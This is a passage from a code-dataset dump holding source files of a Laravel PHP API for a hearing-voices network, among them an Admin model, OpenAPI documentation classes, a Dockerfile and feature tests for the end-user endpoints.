$event->getUserAgent() === 'Symfony';\n }\n );\n }\n}\n"
},
{
"alpha_fraction": 0.6756756901741028,
"alphanum_fraction": 0.6773648858070374,
"avg_line_length": 24.7391300201416,
"blob_id": "ce84416a2592d946f9746b09225e0eeb167857aa",
"content_id": "dd309318f4a1dd540ec202327162dc09b110312b",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 592,
"license_type": "permissive",
"max_line_length": 90,
"num_lines": 23,
"path": "/app/Docs/Parameters/FilterParameter.php",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
"text": "<?php\n\ndeclare(strict_types=1);\n\nnamespace App\\Docs\\Parameters;\n\nuse GoldSpecDigital\\ObjectOrientedOAS\\Objects\\BaseObject;\nuse GoldSpecDigital\\ObjectOrientedOAS\\Objects\\Parameter;\n\nclass FilterParameter extends Parameter\n{\n /**\n * @param string|null $objectId\n * @param string $field\n * @return \\GoldSpecDigital\\ObjectOrientedOAS\\Objects\\Parameter\n */\n public static function create(string $objectId = null, string $field = ''): BaseObject\n {\n return parent::create($objectId)\n ->in(static::IN_QUERY)\n ->name(\"filter[{$field}]\");\n }\n}\n"
},
{
"alpha_fraction": 0.663149356842041,
"alphanum_fraction": 0.6639610528945923,
"avg_line_length": 25.782608032226562,
"blob_id": "c10a2be223cbe3de168e62b37c931cb605b77b50",
"content_id": "7a1f40772a377e1a57be8a3aad87d09e1016110d",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 1232,
"license_type": "permissive",
"max_line_length": 84,
"num_lines": 46,
"path": "/app/Models/Admin.php",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
"text": "<?php\n\ndeclare(strict_types=1);\n\nnamespace App\\Models;\n\nuse App\\Mail\\TemplateMail;\nuse App\\VariableSubstitution\\Email\\Admin\\PasswordResetSubstituter;\nuse GoldSpecDigital\\LaravelEloquentUUID\\Database\\Eloquent\\Model;\nuse Illuminate\\Foundation\\Bus\\DispatchesJobs;\nuse Illuminate\\Support\\Arr;\n\nclass Admin extends Model\n{\n use Mutators\\AdminMutators;\n use Relationships\\AdminRelationships;\n use Scopes\\AdminScopes;\n use DispatchesJobs;\n\n /**\n * Indicates if the model should be timestamped.\n *\n * @var bool\n */\n public $timestamps = false;\n\n /**\n * Send the password reset notification.\n *\n * @param string $token\n */\n public function sendPasswordResetNotification($token): void\n {\n /** @var array $emailContent */\n $emailContent = Setting::findOrFail('email_content')->value;\n\n $passwordResetUrl = route('auth.admin.password.reset', ['token' => $token]);\n\n $this->dispatchNow(new TemplateMail(\n $this->user->email,\n Arr::get($emailContent, 'admin.password_reset.subject'),\n Arr::get($emailContent, 'admin.password_reset.body'),\n new PasswordResetSubstituter($this, $passwordResetUrl)\n ));\n }\n}\n"
},
{
"alpha_fraction": 0.6024242639541626,
"alphanum_fraction": 0.6028282642364502,
"avg_line_length": 37.671875,
"blob_id": "ac8046c2ea0c694095c88120b5c5dfd9e2e5533e",
"content_id": "c75a91de4958b490ebf9e334c74d6ee8c6c5ecb5",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 2475,
"license_type": "permissive",
"max_line_length": 85,
"num_lines": 64,
"path": "/app/Docs/Operations/Admins/IndexAdminOperation.php",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
"text": "<?php\n\ndeclare(strict_types=1);\n\nnamespace App\\Docs\\Operations\\Admins;\n\nuse App\\Docs\\Parameters\\FilterParameter;\nuse App\\Docs\\Parameters\\PageParameter;\nuse App\\Docs\\Parameters\\PerPageParameter;\nuse App\\Docs\\Parameters\\SortParameter;\nuse App\\Docs\\Schemas\\Admin\\AdminSchema;\nuse App\\Docs\\Schemas\\PaginationSchema;\nuse App\\Docs\\Tags\\AdminsTag;\nuse App\\Docs\\Utils;\nuse App\\Models\\Admin;\nuse GoldSpecDigital\\ObjectOrientedOAS\\Objects\\BaseObject;\nuse GoldSpecDigital\\ObjectOrientedOAS\\Objects\\MediaType;\nuse GoldSpecDigital\\ObjectOrientedOAS\\Objects\\Operation;\nuse GoldSpecDigital\\ObjectOrientedOAS\\Objects\\Response;\nuse GoldSpecDigital\\ObjectOrientedOAS\\Objects\\Schema;\n\nclass IndexAdminOperation extends Operation\n{\n /**\n * @param string|null $objectId\n * @throws \\GoldSpecDigital\\ObjectOrientedOAS\\Exceptions\\InvalidArgumentException\n * @return \\GoldSpecDigital\\ObjectOrientedOAS\\Objects\\Operation\n */\n public static function create(string $objectId = null): BaseObject\n {\n return parent::create($objectId)\n ->action(static::ACTION_GET)\n ->summary('List all admins')\n ->description(\n Utils::operationDescription([Admin::class])\n )\n ->tags(AdminsTag::create())\n ->parameters(\n PageParameter::create(),\n PerPageParameter::create(),\n FilterParameter::create(null, 'id')\n ->description('The IDs of the admins to filter by')\n ->schema(Schema::string())\n ->style(FilterParameter::STYLE_SIMPLE),\n FilterParameter::create(null, 'name')\n ->description('The name of the Admin to filter by')\n ->schema(Schema::string()),\n FilterParameter::create(null, 'email')\n ->description('The email of the Admin to filter by')\n ->schema(Schema::string()),\n FilterParameter::create(null, 'phone')\n ->description('The phone of the Admin to filter by')\n ->schema(Schema::string()),\n SortParameter::create(null, ['name', 'email', 'phone'], 'name')\n )\n ->responses(\n Response::ok()->content(\n MediaType::json()->schema(\n PaginationSchema::create(null, AdminSchema::create())\n )\n )\n );\n }\n}\n"
},
{
"alpha_fraction": 0.7428571581840515,
"alphanum_fraction": 0.7591836452484131,
"avg_line_length": 21.272727966308594,
"blob_id": "c3e4a7b9be749295eb0b0c79c239eccf8aed8812",
"content_id": "763635259c9e25b7d702052c067e79bf0cecb8fc",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Dockerfile",
"length_bytes": 245,
"license_type": "permissive",
"max_line_length": 48,
"num_lines": 11,
"path": "/docker/node/Dockerfile",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
"text": "# Set base image.\nFROM node:10.12\n\n# Set maintainer to Ayup Digital.\nLABEL maintainer=\"Ayup Digital\"\n\n# Install git for faster package downloads.\nRUN apt-get install -y git\n\n# Set the working directory to the project root.\nWORKDIR /var/www/html\n"
},
{
"alpha_fraction": 0.6096423268318176,
"alphanum_fraction": 0.6111975312232971,
"avg_line_length": 15.921052932739258,
"blob_id": "1b66f695a035f3509d4d1ffcaac7e28a9249fca3",
"content_id": "38bd8d8dea12b54ec212edd3c7f2330cda150f17",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 643,
"license_type": "permissive",
"max_line_length": 47,
"num_lines": 38,
"path": "/app/Events/Export/ExportRequested.php",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
"text": "<?php\n\ndeclare(strict_types=1);\n\nnamespace App\\Events\\Export;\n\nuse App\\Models\\Export;\nuse Illuminate\\Foundation\\Events\\Dispatchable;\nuse Illuminate\\Queue\\SerializesModels;\n\nclass ExportRequested\n{\n use Dispatchable;\n use SerializesModels;\n\n /**\n * @var \\App\\Models\\Export\n */\n protected $export;\n\n /**\n * ExportCreated constructor.\n *\n * @param \\App\\Models\\Export $export\n */\n public function __construct(Export $export)\n {\n $this->export = $export;\n }\n\n /**\n * @return \\App\\Models\\Export\n */\n public function getExport(): Export\n {\n return $this->export;\n }\n}\n"
},
{
"alpha_fraction": 0.4997623860836029,
"alphanum_fraction": 0.5076192021369934,
"avg_line_length": 30.65998077392578,
"blob_id": "90622aa4d174bd83ad83cee9a83bc69235d53dfc",
"content_id": "f4846bfb08b5484d8e3deb95ccef34243f00f946",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 31565,
"license_type": "permissive",
"max_line_length": 110,
"num_lines": 997,
"path": "/tests/Feature/V1/EndUserControllerTest.php",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
"text": "<?php\n\ndeclare(strict_types=1);\n\nnamespace Tests\\Feature\\V1;\n\nuse App\\Events\\EndpointInvoked;\nuse App\\Mail\\TemplateMail;\nuse App\\Models\\Admin;\nuse App\\Models\\Audit;\nuse App\\Models\\Contribution;\nuse App\\Models\\EndUser;\nuse App\\Models\\Notification;\nuse App\\Models\\Setting;\nuse App\\Models\\User;\nuse App\\VariableSubstitution\\Email\\Admin\\NewEndUserSubstituter;\nuse Illuminate\\Http\\Response;\nuse Illuminate\\Support\\Arr;\nuse Illuminate\\Support\\Facades\\Date;\nuse Illuminate\\Support\\Facades\\Event;\nuse Illuminate\\Support\\Facades\\Queue;\nuse Laravel\\Passport\\Passport;\nuse Tests\\TestCase;\n\nclass EndUserControllerTest extends TestCase\n{\n /*\n * Index.\n */\n\n /** @test */\n public function guest_cannot_index(): void\n {\n $response = $this->getJson('/v1/end-users');\n\n $response->assertStatus(Response::HTTP_UNAUTHORIZED);\n }\n\n /** @test */\n public function end_user_cannot_index(): void\n {\n Passport::actingAs(\n factory(EndUser::class)->create()->user\n );\n\n $response = $this->getJson('/v1/end-users');\n\n $response->assertStatus(Response::HTTP_FORBIDDEN);\n }\n\n /** @test */\n public function admin_can_index(): void\n {\n Passport::actingAs(\n factory(Admin::class)->create()->user\n );\n\n $response = $this->getJson('/v1/end-users');\n\n $response->assertStatus(Response::HTTP_OK);\n }\n\n /** @test */\n public function structure_correct_for_index(): void\n\n {\n factory(EndUser::class)->create();\n\n Passport::actingAs(\n factory(Admin::class)->create()->user\n );\n\n $response = $this->getJson('/v1/end-users');\n\n $response->assertCollectionDataStructure([\n 'id',\n 'email',\n 'country',\n 'birth_year',\n 'gender',\n 'ethnicity',\n 'contributions_count',\n 'public_contributions_count',\n 'private_contributions_count',\n 'in_review_contributions_count',\n 'changes_requested_contributions_count',\n 'gdpr_consented_at',\n 'email_verified_at',\n 'created_at',\n 'updated_at',\n ]);\n }\n\n /** @test */\n public function values_correct_for_index(): void\n {\n $endUser = factory(EndUser::class)->create();\n\n Passport::actingAs(\n factory(Admin::class)->create()->user\n );\n\n $response = $this->getJson('/v1/end-users');\n\n $response->assertJsonFragment([\n 'id' => $endUser->id,\n 'email' => $endUser->user->email,\n 'country' => $endUser->country,\n 'birth_year' => $endUser->birth_year,\n 'gender' => $endUser->gender,\n 'ethnicity' => $endUser->ethnicity,\n 'contributions_count' => 0,\n 'public_contributions_count' => 0,\n 'private_contributions_count' => 0,\n 'in_review_contributions_count' => 0,\n 'changes_requested_contributions_count' => 0,\n 'gdpr_consented_at' => $endUser->gdpr_consented_at->toIso8601String(),\n 'email_verified_at' => null,\n 'created_at' => $endUser->user->created_at->toIso8601String(),\n 'updated_at' => $endUser->user->updated_at->toIso8601String(),\n ]);\n }\n\n /** @test */\n public function can_filter_by_ids_for_index(): void\n {\n $endUser1 = factory(EndUser::class)->create();\n $endUser2 = factory(EndUser::class)->create();\n $endUser3 = factory(EndUser::class)->create();\n\n Passport::actingAs(\n factory(Admin::class)->create()->user\n );\n\n $response = $this->getJson('/v1/end-users', [\n 'filter[id]' => \"{$endUser1->id},{$endUser2->id}\",\n ]);\n\n $response->assertJsonFragment(['id' => $endUser1->id]);\n $response->assertJsonFragment(['id' => $endUser2->id]);\n $response->assertJsonMissing(['id' => $endUser3->id]);\n }\n\n /** @test */\n public function can_filter_by_email_for_index(): void\n 
{\n $endUser1 = factory(EndUser::class)->create([\n 'user_id' => factory(User::class)->create([\n 'email' => '[email protected]',\n ])->id,\n ]);\n $endUser2 = factory(EndUser::class)->create([\n 'user_id' => factory(User::class)->create([\n 'email' => '[email protected]',\n ])->id,\n ]);\n\n Passport::actingAs(\n factory(Admin::class)->create()->user\n );\n\n $response = $this->getJson('/v1/end-users', [\n 'filter[email]' => '[email protected]',\n ]);\n\n $response->assertJsonFragment(['id' => $endUser1->id]);\n $response->assertJsonMissing(['id' => $endUser2->id]);\n }\n\n /** @test */\n public function can_filter_by_email_verified_for_index(): void\n {\n $endUser1 = factory(EndUser::class)->create([\n 'user_id' => factory(User::class)->create([\n 'email_verified_at' => Date::now(),\n ])->id,\n ]);\n $endUser2 = factory(EndUser::class)->create([\n 'user_id' => factory(User::class)->create([\n 'email_verified_at' => null,\n ])->id,\n ]);\n\n Passport::actingAs(\n factory(Admin::class)->create()->user\n );\n\n // Only verified emails.\n $response = $this->getJson('/v1/end-users', [\n 'filter[email_verified]' => 'true',\n ]);\n $response->assertJsonFragment(['id' => $endUser1->id]);\n $response->assertJsonMissing(['id' => $endUser2->id]);\n\n // Only non-verified emails.\n $response = $this->getJson('/v1/end-users', [\n 'filter[email_verified]' => 'false',\n ]);\n $response->assertJsonMissing(['id' => $endUser1->id]);\n $response->assertJsonFragment(['id' => $endUser2->id]);\n\n // All end users, regardless of email verification status.\n $response = $this->getJson('/v1/end-users', [\n 'filter[email_verified]' => 'all',\n ]);\n $response->assertJsonFragment(['id' => $endUser1->id]);\n $response->assertJsonFragment(['id' => $endUser2->id]);\n }\n\n /** @test */\n public function can_filter_by_with_soft_deletes_for_index(): void\n {\n $endUser1 = factory(EndUser::class)->create([\n 'user_id' => factory(User::class)->create([\n 'deleted_at' => Date::now(),\n ])->id,\n ]);\n $endUser2 = factory(EndUser::class)->create([\n 'user_id' => factory(User::class)->create([\n 'deleted_at' => null,\n ])->id,\n ]);\n\n Passport::actingAs(\n factory(Admin::class)->create()->user\n );\n\n // Only soft deleted.\n $response = $this->getJson('/v1/end-users', [\n 'filter[with_soft_deletes]' => 'true',\n ]);\n $response->assertJsonFragment(['id' => $endUser1->id]);\n $response->assertJsonFragment(['id' => $endUser2->id]);\n\n // Only active (default).\n $response = $this->getJson('/v1/end-users', [\n 'filter[with_soft_deletes]' => 'false',\n ]);\n $response->assertJsonMissing(['id' => $endUser1->id]);\n $response->assertJsonFragment(['id' => $endUser2->id]);\n }\n\n /** @test */\n public function can_sort_by_email_for_index(): void\n {\n $endUser1 = factory(EndUser::class)->create([\n 'user_id' => factory(User::class)->create([\n 'email' => '[email protected]',\n ])->id,\n ]);\n $endUser2 = factory(EndUser::class)->create([\n 'user_id' => factory(User::class)->create([\n 'email' => '[email protected]',\n ])->id,\n ]);\n\n Passport::actingAs(\n factory(Admin::class)->create([\n 'user_id' => factory(User::class)->create([\n 'email' => '[email protected]',\n ])->id,\n ])->user\n );\n\n $response = $this->getJson('/v1/end-users', ['sort' => '-email']);\n\n $response->assertNthIdInCollection(0, $endUser1->id);\n $response->assertNthIdInCollection(1, $endUser2->id);\n }\n\n /** @test */\n public function endpoint_invoked_event_dispatched_for_index(): void\n {\n Event::fake([EndpointInvoked::class]);\n\n /** @var 
\\App\\Models\\User $user */\n $user = factory(Admin::class)->create()->user;\n\n Passport::actingAs($user);\n\n $this->getJson('/v1/end-users');\n\n Event::assertDispatched(\n EndpointInvoked::class,\n function (EndpointInvoked $event) use ($user): bool {\n return $event->getUser()->is($user)\n && $event->getClient() === null\n && $event->getAction() === Audit::ACTION_READ\n && $event->getDescription() === 'Viewed all end users.'\n && $event->getIpAddress() === '127.0.0.1'\n && $event->getUserAgent() === 'Symfony';\n }\n );\n }\n\n /*\n * Store.\n */\n\n /** @test */\n public function guest_can_store(): void\n {\n $response = $this->postJson('/v1/end-users', [\n 'email' => '[email protected]',\n 'password' => 'P@55w0rD!',\n 'country' => 'United Kingdom',\n 'birth_year' => 1995,\n 'gender' => 'Male',\n 'ethnicity' => 'Asian White',\n ]);\n\n $response->assertStatus(Response::HTTP_CREATED);\n }\n\n /** @test */\n public function end_user_cannot_store(): void\n {\n Passport::actingAs(\n factory(EndUser::class)->create()->user\n );\n\n $response = $this->postJson('/v1/end-users');\n\n $response->assertStatus(Response::HTTP_FORBIDDEN);\n }\n\n /** @test */\n public function admin_can_store(): void\n {\n Passport::actingAs(\n factory(Admin::class)->create()->user\n );\n\n $response = $this->postJson('/v1/end-users', [\n 'email' => '[email protected]',\n 'password' => 'P@55w0rD!',\n 'country' => 'United Kingdom',\n 'birth_year' => 1995,\n 'gender' => 'Male',\n 'ethnicity' => 'Asian White',\n ]);\n\n $response->assertStatus(Response::HTTP_CREATED);\n }\n\n /** @test */\n public function structure_correct_for_store(): void\n {\n $response = $this->postJson('/v1/end-users', [\n 'email' => '[email protected]',\n 'password' => 'P@55w0rD!',\n 'country' => 'United Kingdom',\n 'birth_year' => 1995,\n 'gender' => 'Male',\n 'ethnicity' => 'Asian White',\n ]);\n\n $response->assertResourceDataStructure([\n 'id',\n 'email',\n 'country',\n 'birth_year',\n 'gender',\n 'ethnicity',\n 'contributions_count',\n 'public_contributions_count',\n 'private_contributions_count',\n 'in_review_contributions_count',\n 'changes_requested_contributions_count',\n 'gdpr_consented_at',\n 'email_verified_at',\n 'created_at',\n 'updated_at',\n 'deleted_at',\n ]);\n }\n\n /** @test */\n public function values_correct_for_store(): void\n {\n $now = Date::now();\n Date::setTestNow($now);\n\n $response = $this->postJson('/v1/end-users', [\n 'email' => '[email protected]',\n 'password' => 'P@55w0rD!',\n 'country' => 'United Kingdom',\n 'birth_year' => 1995,\n 'gender' => 'Male',\n 'ethnicity' => 'Asian White',\n ]);\n\n $response->assertJsonFragment([\n 'email' => '[email protected]',\n 'country' => 'United Kingdom',\n 'birth_year' => 1995,\n 'gender' => 'Male',\n 'ethnicity' => 'Asian White',\n 'contributions_count' => 0,\n 'public_contributions_count' => 0,\n 'private_contributions_count' => 0,\n 'in_review_contributions_count' => 0,\n 'changes_requested_contributions_count' => 0,\n 'gdpr_consented_at' => $now->toIso8601String(),\n 'email_verified_at' => null,\n 'created_at' => $now->toIso8601String(),\n 'updated_at' => $now->toIso8601String(),\n 'deleted_at' => null,\n ]);\n }\n\n /** @test */\n public function endpoint_invoked_event_dispatched_for_store(): void\n {\n Event::fake([EndpointInvoked::class]);\n\n /** @var \\App\\Models\\User $user */\n $user = factory(Admin::class)->create()->user;\n\n Passport::actingAs($user);\n\n $response = $this->postJson('/v1/end-users', [\n 'email' => '[email protected]',\n 'password' => 
'P@55w0rD!',\n 'country' => 'United Kingdom',\n 'birth_year' => 1995,\n 'gender' => 'Male',\n 'ethnicity' => 'Asian White',\n ]);\n\n $endUser = EndUser::findOrFail($response->getId());\n\n Event::assertDispatched(\n EndpointInvoked::class,\n function (EndpointInvoked $event) use ($user, $endUser): bool {\n return $event->getUser()->is($user)\n && $event->getClient() === null\n && $event->getAction() === Audit::ACTION_CREATE\n && $event->getDescription() === \"Created end user [{$endUser->id}].\"\n && $event->getIpAddress() === '127.0.0.1'\n && $event->getUserAgent() === 'Symfony';\n }\n );\n }\n\n /** @test */\n public function email_sent_to_admins_for_store(): void\n {\n Queue::fake();\n\n Passport::actingAs(\n factory(Admin::class)->create()->user\n );\n\n $this->postJson('/v1/end-users', [\n 'email' => '[email protected]',\n 'password' => 'P@55w0rD!',\n 'country' => 'United Kingdom',\n 'birth_year' => 1995,\n 'gender' => 'Male',\n 'ethnicity' => 'Asian White',\n ]);\n\n Queue::assertPushed(\n TemplateMail::class,\n function (TemplateMail $mail): bool {\n /** @var array $emailContent */\n $emailContent = Setting::findOrFail('email_content')->value;\n\n return $mail->getTo() === config('connecting_voices.admin_email')\n && $mail->getSubject() === Arr::get($emailContent, 'admin.new_end_user.subject')\n && $mail->getBody() === Arr::get($emailContent, 'admin.new_end_user.body')\n && $mail->getSubstituter() instanceof NewEndUserSubstituter;\n }\n );\n }\n\n /** @test */\n public function validation_error_given_when_email_belongs_to_soft_deleted_end_user(): void\n {\n $user = factory(User::class)->create([\n 'email' => '[email protected]',\n 'deleted_at' => Date::today(),\n ]);\n factory(EndUser::class)->create([\n 'user_id' => $user->id,\n ]);\n\n $response = $this->postJson('/v1/end-users', [\n 'email' => '[email protected]',\n 'password' => 'P@55w0rD!',\n 'country' => 'United Kingdom',\n 'birth_year' => 1995,\n 'gender' => 'Male',\n 'ethnicity' => 'Asian White',\n ]);\n\n $response->assertJsonValidationErrors('email');\n $response->assertJsonFragment([\n 'errors' => [\n 'email' => [\n sprintf(\n 'The account has been withdrawn. 
Please contact the admin team via %s for more info.',\n config('connecting_voices.admin_email')\n ),\n ],\n ],\n ]);\n }\n\n /*\n * Show.\n */\n\n /** @test */\n public function guest_cannot_show(): void\n {\n $endUser = factory(EndUser::class)->create();\n\n $response = $this->getJson(\"/v1/end-users/{$endUser->id}\");\n\n $response->assertStatus(Response::HTTP_UNAUTHORIZED);\n }\n\n /** @test */\n public function end_user_for_someone_else_cannot_show(): void\n {\n $endUser = factory(EndUser::class)->create();\n\n Passport::actingAs(\n factory(EndUser::class)->create()->user\n );\n\n $response = $this->getJson(\"/v1/end-users/{$endUser->id}\");\n\n $response->assertStatus(Response::HTTP_FORBIDDEN);\n }\n\n /** @test */\n public function end_user_for_them_self_can_show(): void\n {\n $endUser = factory(EndUser::class)->create();\n\n Passport::actingAs($endUser->user);\n\n $response = $this->getJson(\"/v1/end-users/{$endUser->id}\");\n\n $response->assertStatus(Response::HTTP_OK);\n }\n\n /** @test */\n public function admin_can_show(): void\n {\n $endUser = factory(EndUser::class)->create();\n\n Passport::actingAs(\n factory(Admin::class)->create()->user\n );\n\n $response = $this->getJson(\"/v1/end-users/{$endUser->id}\");\n\n $response->assertStatus(Response::HTTP_OK);\n }\n\n /** @test */\n public function structure_correct_for_show(): void\n {\n $endUser = factory(EndUser::class)->create();\n\n Passport::actingAs(\n factory(Admin::class)->create()->user\n );\n\n $response = $this->getJson(\"/v1/end-users/{$endUser->id}\");\n\n $response->assertResourceDataStructure([\n 'id',\n 'email',\n 'country',\n 'birth_year',\n 'gender',\n 'ethnicity',\n 'contributions_count',\n 'public_contributions_count',\n 'private_contributions_count',\n 'in_review_contributions_count',\n 'changes_requested_contributions_count',\n 'gdpr_consented_at',\n 'email_verified_at',\n 'created_at',\n 'updated_at',\n 'deleted_at',\n ]);\n }\n\n /** @test */\n public function values_correct_for_show(): void\n {\n $endUser = factory(EndUser::class)->create();\n\n Passport::actingAs(\n factory(Admin::class)->create()->user\n );\n\n $response = $this->getJson(\"/v1/end-users/{$endUser->id}\");\n\n $response->assertJsonFragment([\n 'id' => $endUser->id,\n 'email' => $endUser->user->email,\n 'country' => $endUser->country,\n 'birth_year' => $endUser->birth_year,\n 'gender' => $endUser->gender,\n 'ethnicity' => $endUser->ethnicity,\n 'contributions_count' => 0,\n 'public_contributions_count' => 0,\n 'private_contributions_count' => 0,\n 'in_review_contributions_count' => 0,\n 'changes_requested_contributions_count' => 0,\n 'gdpr_consented_at' => $endUser->gdpr_consented_at->toIso8601String(),\n 'email_verified_at' => null,\n 'created_at' => $endUser->user->created_at->toIso8601String(),\n 'updated_at' => $endUser->user->updated_at->toIso8601String(),\n 'deleted_at' => null,\n ]);\n }\n\n /** @test */\n public function endpoint_invoked_event_dispatched_for_show(): void\n {\n Event::fake([EndpointInvoked::class]);\n\n /** @var \\App\\Models\\User $user */\n $user = factory(Admin::class)->create()->user;\n\n /** @var \\App\\Models\\EndUser $endUser */\n $endUser = factory(EndUser::class)->create();\n\n Passport::actingAs($user);\n\n $this->getJson(\"/v1/end-users/{$endUser->id}\");\n\n Event::assertDispatched(\n EndpointInvoked::class,\n function (EndpointInvoked $event) use ($user, $endUser): bool {\n return $event->getUser()->is($user)\n && $event->getClient() === null\n && $event->getAction() === Audit::ACTION_READ\n && 
$event->getDescription() === \"Viewed end user [{$endUser->id}].\"\n && $event->getIpAddress() === '127.0.0.1'\n && $event->getUserAgent() === 'Symfony';\n }\n );\n }\n\n /*\n * Update.\n */\n\n /** @test */\n public function guest_cannot_update(): void\n {\n $endUser = factory(EndUser::class)->create();\n\n $response = $this->putJson(\"/v1/end-users/{$endUser->id}\");\n\n $response->assertStatus(Response::HTTP_UNAUTHORIZED);\n }\n\n /** @test */\n public function end_user_for_someone_else_cannot_update(): void\n {\n $endUser = factory(EndUser::class)->create();\n\n Passport::actingAs(\n factory(EndUser::class)->create()->user\n );\n\n $response = $this->putJson(\"/v1/end-users/{$endUser->id}\");\n\n $response->assertStatus(Response::HTTP_FORBIDDEN);\n }\n\n /** @test */\n public function end_user_for_them_self_can_update(): void\n {\n $endUser = factory(EndUser::class)->create();\n\n Passport::actingAs($endUser->user);\n\n $response = $this->putJson(\"/v1/end-users/{$endUser->id}\", [\n 'email' => '[email protected]',\n 'password' => 'P@55w0rD!',\n 'country' => 'United Kingdom',\n 'birth_year' => 1995,\n 'gender' => 'Male',\n 'ethnicity' => 'Asian White',\n ]);\n\n $response->assertStatus(Response::HTTP_OK);\n }\n\n /** @test */\n public function admin_cannot_update(): void\n {\n $endUser = factory(EndUser::class)->create();\n\n Passport::actingAs(\n factory(Admin::class)->create()->user\n );\n\n $response = $this->putJson(\"/v1/end-users/{$endUser->id}\");\n\n $response->assertStatus(Response::HTTP_FORBIDDEN);\n }\n\n /** @test */\n public function structure_correct_for_update(): void\n {\n $endUser = factory(EndUser::class)->create();\n\n Passport::actingAs($endUser->user);\n\n $response = $this->putJson(\"/v1/end-users/{$endUser->id}\", [\n 'email' => '[email protected]',\n 'password' => 'P@55w0rD!',\n 'country' => 'United Kingdom',\n 'birth_year' => 1995,\n 'gender' => 'Male',\n 'ethnicity' => 'Asian White',\n ]);\n\n $response->assertResourceDataStructure([\n 'id',\n 'email',\n 'country',\n 'birth_year',\n 'gender',\n 'ethnicity',\n 'contributions_count',\n 'public_contributions_count',\n 'private_contributions_count',\n 'in_review_contributions_count',\n 'changes_requested_contributions_count',\n 'gdpr_consented_at',\n 'email_verified_at',\n 'created_at',\n 'updated_at',\n 'deleted_at',\n ]);\n }\n\n /** @test */\n public function values_correct_for_update(): void\n {\n $endUser = factory(EndUser::class)->create();\n\n $now = Date::now();\n Date::setTestNow($now);\n\n Passport::actingAs($endUser->user);\n\n $response = $this->putJson(\"/v1/end-users/{$endUser->id}\", [\n 'email' => '[email protected]',\n 'password' => 'P@55w0rD!',\n 'country' => 'United Kingdom',\n 'birth_year' => 1995,\n 'gender' => 'Male',\n 'ethnicity' => 'Asian White',\n ]);\n\n $response->assertJsonFragment([\n 'id' => $endUser->id,\n 'email' => '[email protected]',\n 'country' => 'United Kingdom',\n 'birth_year' => 1995,\n 'gender' => 'Male',\n 'ethnicity' => 'Asian White',\n 'contributions_count' => 0,\n 'public_contributions_count' => 0,\n 'private_contributions_count' => 0,\n 'in_review_contributions_count' => 0,\n 'changes_requested_contributions_count' => 0,\n 'gdpr_consented_at' => $endUser->gdpr_consented_at->toIso8601String(),\n 'email_verified_at' => null,\n 'created_at' => $endUser->user->created_at->toIso8601String(),\n 'updated_at' => $now->toIso8601String(),\n 'deleted_at' => null,\n ]);\n }\n\n /** @test */\n public function only_password_can_be_provided_for_update(): void\n {\n $endUser = 
factory(EndUser::class)->create();\n\n $now = Date::now();\n Date::setTestNow($now);\n\n Passport::actingAs($endUser->user);\n\n $response = $this->putJson(\"/v1/end-users/{$endUser->id}\", [\n 'password' => 'P@55w0rD!',\n ]);\n\n $response->assertJsonFragment([\n 'id' => $endUser->id,\n 'email' => $endUser->user->email,\n 'country' => $endUser->country,\n 'birth_year' => $endUser->birth_year,\n 'gender' => $endUser->gender,\n 'ethnicity' => $endUser->ethnicity,\n 'gdpr_consented_at' => $endUser->gdpr_consented_at->toIso8601String(),\n 'email_verified_at' => null,\n 'created_at' => $endUser->user->created_at->toIso8601String(),\n 'updated_at' => $now->toIso8601String(),\n 'deleted_at' => null,\n ]);\n }\n\n /** @test */\n public function endpoint_invoked_event_dispatched_for_update(): void\n {\n Event::fake([EndpointInvoked::class]);\n\n /** @var \\App\\Models\\EndUser $endUser */\n $endUser = factory(EndUser::class)->create();\n\n Passport::actingAs($endUser->user);\n\n $this->putJson(\"/v1/end-users/{$endUser->id}\", [\n 'email' => '[email protected]',\n 'password' => 'P@55w0rD!',\n 'country' => 'United Kingdom',\n 'birth_year' => 1995,\n 'gender' => 'Male',\n 'ethnicity' => 'Asian White',\n ]);\n\n Event::assertDispatched(\n EndpointInvoked::class,\n function (EndpointInvoked $event) use ($endUser): bool {\n return $event->getUser()->is($endUser->user)\n && $event->getClient() === null\n && $event->getAction() === Audit::ACTION_UPDATE\n && $event->getDescription() === \"Updated end user [{$endUser->id}].\"\n && $event->getIpAddress() === '127.0.0.1'\n && $event->getUserAgent() === 'Symfony';\n }\n );\n }\n\n /*\n * Destroy.\n */\n\n /** @test */\n public function guest_cannot_destroy(): void\n {\n $endUser = factory(EndUser::class)->create();\n\n $response = $this->deleteJson(\"/v1/end-users/{$endUser->id}\");\n\n $response->assertStatus(Response::HTTP_UNAUTHORIZED);\n }\n\n /** @test */\n public function end_user_for_someone_else_cannot_destroy(): void\n {\n $endUser = factory(EndUser::class)->create();\n\n Passport::actingAs(\n factory(EndUser::class)->create()->user\n );\n\n $response = $this->deleteJson(\"/v1/end-users/{$endUser->id}\", ['type' => 'force_delete']);\n\n $response->assertStatus(Response::HTTP_FORBIDDEN);\n }\n\n /** @test */\n public function end_user_for_them_self_can_destroy(): void\n {\n $endUser = factory(EndUser::class)->create();\n\n Passport::actingAs($endUser->user);\n\n $response = $this->deleteJson(\"/v1/end-users/{$endUser->id}\", ['type' => 'force_delete']);\n\n $response->assertStatus(Response::HTTP_OK);\n }\n\n /** @test */\n public function admin_can_destroy(): void\n {\n $endUser = factory(EndUser::class)->create();\n\n Passport::actingAs(\n factory(Admin::class)->create()->user\n );\n\n $response = $this->deleteJson(\"/v1/end-users/{$endUser->id}\", ['type' => 'force_delete']);\n\n $response->assertStatus(Response::HTTP_OK);\n }\n\n /** @test */\n public function database_records_and_relationships_deleted_for_force_destroy(): void\n {\n $endUser = factory(EndUser::class)->create();\n $contribution = factory(Contribution::class)->create(['end_user_id' => 